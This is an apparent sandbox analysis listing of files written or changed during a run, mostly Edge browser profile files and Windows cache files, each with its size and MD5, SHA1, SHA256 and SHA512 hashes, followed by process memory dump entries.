C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
b11a6e8d805456b17e108a5208a410f5

SHA1
d28b510cfe93b8c25656b24139b0f259e32d1c97

SHA256
7d142b1eb537ca38c4c68296a2abc6f3550de0b3eba51e542ef6fb40e7fcc77b

SHA512
0073f47f0aab8566a9dd52ec252fb91b285748d6e5cb6980ba38195fc2ad8798e541665f9f011ac958c2c0490f914518058b7e3593f0fcd4d2614a9c3e128be3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
7KB

MD5
8fc2342348b45caf6e008e8da00bea00

SHA1
52de51c574b3a93f2d4a5a0fc4a92c4ba94e8574

SHA256
471001586687f108e022e7517c02c501837ac2d6c950c01cb8591a32f8856721

SHA512
82c3b2ff6297c80371e584149af703782c6f65868d7c76657839860e58104c17abca974aa2e3b50bbbc831f5c964cb0cd65e0a2b8c8ec195a9df5b11d32c59cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
546a8392a3c47581dce4511be92b045b

SHA1
7a2020e9af64481725dfd06a5732f7ed1e3419d6

SHA256
efc7f012f3dff14f7c530accb8df1b25612c93938547c41126e78b04cea4157c

SHA512
a66c9e6da6e100d35fa81ab6acb166fb7b363175ff2feb0bcc2846126b28567ad682e330b71cb8d89a5aff12992faccad125636ab2f898bda747603b94f450ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
f8c96dc056efa689c5adabe49b6433ff

SHA1
2525c822fde4d8f4f809e657a3aa2ae6b7b4d014

SHA256
360f47c1be742696dc5671c5bb447fdc63a2ce4fdac3fae42962c0874a659115

SHA512
82e5a178822c7b578ff96a93644d683a3e61f639a0f12590d63fd3888eb1c95bfedd9a91e411c63552072eef55dbf4995dce550890de7278150f9c219547fb02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
6d57d5cdddcdebc53f7a2a96a6450634

SHA1
0a35545d660846b081ff36379635ebefd4d61ad5

SHA256
aabd84973531a04177834fd5d2f221f5cc10056bb3343c0d2cca2f0b9da00c0b

SHA512
101bc4332e8c278d64b6dcb5e26a52945d01a58606c4dccd10e96ff7de21e695463fb05f2b3f6f19e5ac416bb50a59213fbfa28f49ab9af328c2fede8740e999

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
acbbe684aa64dfe65193148da10689ac

SHA1
c9d1dd79ef77924960279210667568c36b698fd9

SHA256
45c8f9620ab1857aac0a5c0998b7964876685a12575dfc565e26b0b7aca25000

SHA512
039483f625b8a2e3d1b86c2e672ce22b567630bc6dc9af23eec9dd268eb20e2e99bf123e984f7b35c7a12ec85a2744f00e7136d83b466c4d08092ef9705c08b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
47733bf8f9cd74312fd4382a930ee5b2

SHA1
d1c13230624e274dcd09262ddc0c147db5fb5d38

SHA256
3b2e4dfdfbf5213b8eb0357ce29c33e4a3f908a040b57e16608d0287e8a4c22c

SHA512
0ae8b4f444b361e008528a65c7a1316f5e474e62ca8269760983423c99db2446edfd4a0382123340cb5170dbed1acfb48f39a96191b1fe4302bbbbbf8a440026

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\cbb0fe12-2586-460f-b56d-6c288b566783\index-dir\the-real-index

Filesize
72B

MD5
f3e5a9cd77589851d86864f52d29d3ce

SHA1
ea81009ada85c2d806a5e6878b60f79651882b1f

SHA256
11b7de006c965372caf6012c822433876cdc82d418f59a781245736a03ac93c1

SHA512
ff5cb6ae5bbb41a650256fd059d73ebde7c7cec1193c78a2149b87715af741961dbd46cf2b762356922a1bf159d066c578d57fdcbebc6df85d7eca798006ae30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\cbb0fe12-2586-460f-b56d-6c288b566783\index-dir\the-real-index~RFe58d85a.TMP

Filesize
48B

MD5
54bc10bd60cd6d21eff36d6ca0186648

SHA1
3387541869406d9da9a63d9bec39fa1f9b6ff431

SHA256
a0c397c62d030d71b66cf31ac6489da6d2b6d309171302e28f805912316f4200

SHA512
d832699c952762f4813a8337b352ef72d3057144f4b9241bc1d121e44a39922eba3aaaece0e85f1be156533645afa1d85e5859f007deef3344c9235fb00e5a44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

Filesize
98B

MD5
667953544f60ffee672aa3ebd37110a3

SHA1
8f8640263a8b9e338609e4d692c64dc872bb2084

SHA256
ba3d0761fe2de1bb4e3ce20d4442f8d1910ffd65f19c1ad0a84b5279222db8ed

SHA512
667bcf713cf2534c15a8ec90ed01962da717693458bbdd6dd48a91fad97b6ffe34330a1dd028b185903dc8bd9b32a353c9b044e367e62f285a36b9b3a3cac300

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

Filesize
92B

MD5
d70dd2fbe25424a28f60ff40c6b2d780

SHA1
b4de3df1067bdf00c337958def65614207851179

SHA256
04f50b43b168f6e85a70ada92b532f62c456c131617c3012bcf49bc947f84a06

SHA512
3ecfa5674b5489de7eaafb17d51b978569ab1084b43e5f2a5130ed6bd8591b97f67fda69ba7a4efcbfe188fa7d9344ec4154d02fe6193fbd8622506a243da8a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
c72ab7c348d4f6d19cd4e76d8d436b81

SHA1
34b15b770ae1649beeaba54ff17430da363ee665

SHA256
305a8371de2e3a6cfe9d035d9d1bc2963b6619d7b0dae4b47fee983dde03e04b

SHA512
31f7e445254a6607caea2149c04464951e0e877f306ad03a7fb6c72cd9ddb537193b5fee35083153faca9990ce3526a92f3ba847f6da1e3169ffbd0d31c24f7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d618.TMP

Filesize
48B

MD5
1cb53bf1b9c60ee60a7897e29b75c370

SHA1
fded4c759a14437b470ee4683232cc03af45a187

SHA256
02f8f6782d288cce64e059fed28fe7deffd3e01cc1d9aa4ce666d43f65c68c3b

SHA512
3a40150464e0cffe1c0a74e0692e14ed69ec3431f287e81dd5f4fbf4b118f474996ae13969b81651b5d549217398b4f2488e6c307b09ea2359cac87d12475f2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
fcdc2b8e7ad4539b035310ded077acd3

SHA1
d5ed42a9acca8791dab6cb3430b0ada6e588803b

SHA256
0fde027fdb605dc28c6462fa0a5b48df23d64a0f0c5b8b0077a07d52d63a01c9

SHA512
c6323be47553d2abc8d05a0d91710e038609e6904224b6d644acd47b565826ce4487231d5bbc5b8ab1bdade34b243bea4cc5796c0a806cefc10286d79e3ef9e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
15613b11119a7f9b9d8c0ba67f7f5747

SHA1
3bd731de9f8339fbd2f2925afddbfe868f4dec1c

SHA256
9ec8ca2fc436e5fabac21f1b4271f9c4548757a765053f3e254f2b185363fc49

SHA512
797eb5332ee6ee0e01bf92224e836aeb35e160e32f1ddcd15bd215eda345e3909672ac885df3fe880dbfc5b45ab5ab99374f10f5c5682a6aca71a548243e7d02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
82688aa4fed317ce12b712167763ba5b

SHA1
581101ed2cffab17c915294cf147374ddd0e279b

SHA256
fb67e61669e48d188159fd2cadeec756afccad7e95ead1835b2877fb236d50ec

SHA512
15572e47a417f4f8c5920fe326f2115904c611d15f71810c08452333d2af344b25d4cd04b412750b5e72fbe90be6933b4ed857aab6e9a4d8886ad1d073fd9026

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58968e.TMP

Filesize
538B

MD5
79e5225bc6a0a8c5b83de93a77c990a2

SHA1
e210549e9d2f592a193ee2900e11da90cc7a2c29

SHA256
d3e6698a409b6bea411cf6505685e9773c440a4e72ef27123d33ca8924fd068c

SHA512
38ddf63653ef2dc1fc45c05a1da5dca6450d3d9076abc741f2c5141ad6df64036fc6ceb799ad988d2809cf6c2ccea2f59fd7ca5a28f53292cac4755dd3332035

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
0feeb428fd5326a8ce7b3f0de3880635

SHA1
08a84fbe951f191c15c958deba36434737fe960a

SHA256
9a130c47b66c9d8e336e23e85fb221717d529f82c565810e5e111b722d6a8e71

SHA512
05dbddd7d5ed4907bdc44a749f2a0c849b1c8036fe7e7c7224f1c20dcf58f5c59e0b8515773e28a77f7bc7cdcbdc85d668af5b1fd20eebecd0fafff594df9614

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1f9083cb57631c2d9705c37bd5446bca

SHA1
b05759d5367260948955fb47ea61e6b87ffec5f6

SHA256
a0b2de27b2490b408e6eaf779b48a7b6c0d13eeabe746c71239d51944470667b

SHA512
42074e10d70d8973807b999ad3e3bd4fd4439ef07045e658c0669092739ac6c83ee819c4e6fc6528d102096304ac569e22e4295e5caaafe3d1894c3b3d52554a

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\8d0bd7d6-a64a-4c44-a744-d98092a6df26.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
76fbe77cbc68f3bd5f0decad25775716

SHA1
2ebc2dea0b2224ea73fb5413d94ad38218122bf3

SHA256
8d59129db45c9f234318144380c9d167d89a9faa8e2a6aede9b5a3bcfdf650b6

SHA512
1a5d850914bd033defe42de3a333c2a7497927a07289258acd5ec08e973b4ed45030b0f299d6da5bac16ad607ed471b3db52a5c9676a532ecaa0836682618230

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
0c71204dc7dd088aa8f1b279e29d7bf5

SHA1
475dbeb8589312574e6b5f3ca2913b8b80af155b

SHA256
28f655f695c0992c73fa7b02fca2c93b65aec5b8c82297e1be30ed9016eb54a1

SHA512
f10ec78286923446833e4f19900a790be0440885688fe273a811648de090a765ea82ef8ccc062987ec12285e0de608b803671d01358a18dd4504f90845169826

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfd4d2d2.4a0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/448-11-0x00007FFB882F0000-0x00007FFB88DB2000-memory.dmp

Filesize
10.8MB

Download
memory/448-10-0x00007FFB882F0000-0x00007FFB88DB2000-memory.dmp

Filesize
10.8MB

Download
memory/448-15-0x0000021BE1F20000-0x0000021BE1F38000-memory.dmp

Filesize
96KB

Download
memory/448-0-0x00007FFB882F3000-0x00007FFB882F5000-memory.dmp

Filesize
8KB

Download
memory/448-12-0x00007FFB882F0000-0x00007FFB88DB2000-memory.dmp

Filesize
10.8MB

Download
memory/448-3-0x0000021BE1D10000-0x0000021BE1D32000-memory.dmp

Filesize
136KB

Download
memory/448-13-0x0000021BE1D80000-0x0000021BE1D88000-memory.dmp

Filesize
32KB

Download
memory/448-16-0x00007FFB882F0000-0x00007FFB88DB2000-memory.dmp

Filesize
10.8MB

Download
memory/448-14-0x0000021BE1EC0000-0x0000021BE1EFA000-memory.dmp

Filesize
232KB

Download